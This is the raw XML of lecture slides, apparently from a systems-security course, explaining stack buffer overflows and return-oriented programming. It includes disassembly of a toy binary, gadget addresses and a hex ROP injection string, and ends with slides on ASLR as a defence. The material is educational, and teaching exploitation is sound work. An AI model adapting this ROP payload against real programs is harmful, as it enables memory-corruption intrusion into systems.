              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96A1CB8-2278-2C4B-A170-E73D77ECC77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4134185"/>
            <a:ext cx="8218834"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0000000000400657 &lt;main&gt;:</a:t>
            </a:r>
          </a:p>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400665:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066a:       48 83 c4 08             add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066e:       c3                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287253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Gadget Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9D057C-3B77-B64A-9271-9EA9651F74BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Re-purposed bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="3416300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x400606: 40 00 E8	add %bpl, %al</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x400609: C3	ret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TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848716C0-C257-7A40-BF8B-C896E46977AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773524" y="2029326"/>
            <a:ext cx="2283510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d has-target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19739C5C-2F43-E340-8542-F587B729873E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2398658"/>
            <a:ext cx="8218834" cy="1512429"/>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00000000004005ff &lt;</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4005ff:       48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 18             sub    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400603:       bf 4f 07 40 00          mov    $0x40074f,%edi</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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4004d0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40060d:       48 8d 74 24 08          lea    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsi</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186165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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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vertic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ROP Injection String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936C265C-A07A-2641-ABE8-067EED7C1322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes have to be circuitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, to place 'B' in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</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8" name="Rounded Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2E7A7AC-D85D-0545-A8A4-8939FA6AA91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184525" y="2854387"/>
            <a:ext cx="7393708" cy="256098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fill buffer &amp; padding */</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00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> addresses */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>65 06 40 00 00 00 00 00 // mov $0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; add $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 // filler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>68 05 40 00 00 00 00 00 // pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42 00 00 00 00 00 00 00 // value to be placed in %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>06 60 40 00 00 00 00 00 // add %bpl, %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA998DD-E4F3-5546-A888-78C9EF322CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762760" y="2854387"/>
            <a:ext cx="4213187"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400568:   5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400569:   c3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBA2248-BF93-574A-8AE1-27E6F5FE4780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762760" y="4624892"/>
            <a:ext cx="4307066"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400603:   bf 4f 07 40 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400608:   e8 c3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ff ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E326C6F-A8E5-6E4F-AD75-B6CE99F18798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762759" y="1083882"/>
            <a:ext cx="4213187" cy="1213612"/>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400665:   b8 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066a:   48 83 c4 08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066e:   c3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334B9388-7483-9B4B-B905-D52A2EE0DEDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1630017" y="1411756"/>
            <a:ext cx="6523383" cy="2583756"/>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F196B0-C1B3-7C48-8A31-195E089EDACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1457739" y="1870076"/>
            <a:ext cx="6589642" cy="2573587"/>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ECE7EF-0476-6947-9772-750A8736AA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1630017" y="3326256"/>
            <a:ext cx="6523383" cy="1178032"/>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14F3C9-A166-2442-9218-D91DA4BAA3FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1457739" y="3537667"/>
            <a:ext cx="6695662" cy="1438198"/>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D9126A-DDCF-284D-9299-8AE32164E162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630016" y="5042144"/>
            <a:ext cx="6438902" cy="54617"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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BB3F7F2-27A5-694C-B5EE-09DCACBA92E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1457739" y="5246194"/>
            <a:ext cx="6611180" cy="83155"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="162A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59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par>
                                <p:cTn id="13" presetID="22" presetClass="exit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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xit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">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par>
                                <p:cTn id="28" presetID="22" presetClass="exit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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xit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">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xit" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">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0E7F-81BA-7440-BCF7-8EA119169612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10928420" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Address Space Layout Randomization (ASLR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA9A032-BC16-204B-85A7-C365866F1C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomize addresses of functions in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If function addresses are unknown, gadget locations are unknown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154B7E67-F2DA-3F41-A8F7-E91D23D0214F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC12623A-F921-B142-B7D0-A13E71BE1290}"/>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6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{562682D3-FF5C-0544-913B-512F7103E25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57358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Buffer Overflow possible due to unbounded inputs being placed in arrays that lack bounds checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Place instructions on stack, overwrite return address to start of new instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return-oriented programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find gadgets with the desired instructions, place gadget addresses on stack to be used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
